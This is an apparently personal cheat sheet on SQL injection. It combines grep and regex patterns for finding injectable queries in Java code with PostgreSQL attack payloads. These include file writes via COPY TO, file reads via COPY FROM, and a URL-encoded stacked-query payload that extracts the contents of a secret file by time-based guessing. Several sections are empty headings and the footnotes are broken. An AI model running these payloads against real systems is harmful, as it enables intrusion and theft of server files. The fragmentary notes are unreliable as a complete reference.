SQL Injection tips

Code Review Regex


egrep "^.*?query.*?select.*?" $i
for i in $(cat doGet.txt); do echo $i && egrep "^.*?query.*?select.*?" $i; done

egrep "^.*?\"select.*?" $i
for i in $(cat doGet.txt); do echo $i && egrep "^.*?\"select.*?" $i; done

egrep  "^.*?request\.getParameter\(\"" $i
for i in $(cat doGet.txt); do if egrep -q "^.*?\"select.*?" $i; then if egrep -q "^.*?request\.getParameter\(\"" $i; then echo $i;fi  ;fi; done

# Improved regex
^.*?['"]SELECT.*?['"]\ ?[\+\.]
^.*?['"]UPDATE.*?SET.*?['"]\ ?[\+\.]
^.*?['"]INSERT INTO.*?['"]\ ?[\+\.]

# Targeted/Group Matching
perl -lne 'print $1 if /<REGEX>/' < * 


Alternatives / Bypass

space is /**/
Comment is #

Basic MySQL Queries





Enable Debugging

Helpful URLs:

* OnSecurity[^1]
* Pulse Security[^2]

Basic commands

Specific usual/allowed/working subqueries for specific locations within the query

Write to file system

CREATE TEMP TABLE USERS(userdesccolumn text);INSERT INTO USERS(userdesccolumn) VALUES ($$test$$);
COPY USERS(userdesccolumn) TO $$C:\temp\writtenfile.txt$$;
COPY (SELECT 'USERS') to 'C:\Users\Public\writtenfile.txt';

Reading content from file system

COPY <table_name> from <file_name> # Template
CREATE temp table tempTable (content text);
COPY tempTable from $$c:\secret.txt$$;
;create+temp+table+tempTable+(content+text);copy+tempTable+from+$$c:\secret.txt$$;select+case+when(ascii(substr((select+content+from+tempTable),1,1))=104)+then+pg_sleep(10)+end;--+ # Boolean Time-Based

Executing commands via PostgreSQL Extensions

Large Objects (Uploading a Binary)

[^2]: Pulse Security [^3]: Executing commands via PostgreSQL Extensions [^4]: Medium - Arnav Gupta - Creating user, database and adding access on PostgreSQL [^5]: Chartio - Aj Welch - How to Change a User to Superuser in PostgreSQL [^6]: HackTricks - RCE with PostgreSQL Extensions